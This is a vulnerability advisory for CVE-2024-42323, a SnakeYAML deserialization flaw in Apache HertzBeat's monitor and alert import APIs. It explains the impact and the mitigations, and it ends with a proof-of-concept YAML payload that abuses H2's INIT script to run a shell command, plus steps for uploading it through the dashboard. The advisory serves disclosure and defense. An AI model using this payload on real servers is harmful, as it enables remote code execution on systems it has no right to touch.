HertzBeat SnakeYaml Deserialization

Vulnerable Version
versions before 1.6.0.

Fixed Version
fix version 1.6.0.

Base Score
8.8 High

CVE-2024-42323 Vendor Description:-

Apache HertzBeat is an open-source, real-time monitoring and alerting system designed to track the health and performance of various IT assets, including servers, websites, APIs, databases, and network devices. It supports agentless monitoring, allowing easy integration with different environments using built-in protocols like HTTP, TCP, ICMP, SNMP, and JDBC. HertzBeat features a modern, web-based dashboard for visualization, supports custom metrics, and provides flexible alert rules and notification methods. With its modular architecture and RESTful APIs, it’s especially suited for dynamic cloud-native and containerized infrastructures, making it a powerful alternative to traditional monitoring solutions.

Vulnerability Description:

YAML Deserialization:

In the vulnerable versions of HertzBeat, the SnakeYAML library is used to parse YAML files. YAML is often used for configuration due to its human-readable format. However, because YAML can contain complex data structures like Java objects, deserialization of these structures can be dangerous if the input is not properly sanitized.

Exploiting the Vulnerability:

The vulnerability arises because the API endpoints /api/monitors/import and /api/alert/defines/import allow users to import new monitor types and alert definitions by submitting YAML data.
These API endpoints don’t properly validate or sanitize the YAML content being imported. As a result, attackers can craft specially designed YAML files that contain malicious data.

Untrusted Data:

When the YAML content is parsed by SnakeYAML, it can trigger the deserialization of untrusted data, such as arbitrary Java objects or even executable code, depending on what is defined in the YAML content. This behavior is typically exploited through malicious Java class manipulation.
If the crafted YAML data is successful, it can lead to the execution of arbitrary Java code on the target system, resulting in Remote Code Execution (RCE).

Authentication Requirement:

This vulnerability is only exploitable by authenticated users, which means an attacker must have valid credentials to access the API and upload the malicious YAML file. However, once authenticated, an attacker can exploit the vulnerability and execute code remotely on the HertzBeat server.

Impact:

The impact of this vulnerability is high because it allows authenticated attackers to remotely execute code on the server, potentially leading to full control over the affected system.
This could be used to gain unauthorized access to sensitive data, modify configurations, or further compromise the underlying infrastructure.

Mitigations:

The vulnerability was addressed in Apache HertzBeat version 1.6.0 by updating the SnakeYAML library to a more secure version, reducing the chance of deserialization issues.
Organizations using versions prior to 1.6.0 should immediately upgrade to the most recent version to mitigate the vulnerability.
Furthermore, security best practices like as input validation, least privilege access, and stringent API authorization can help limit the risk of exploitation.

POC

First, create a malicious YAML file whose name ends with .yaml:

!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/success\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ]

Then, log into the HertzBeat dashboard, go to any monitor page, and find the import button. The interface enables users to import monitor setups using YAML files and submit the malicious YAML file: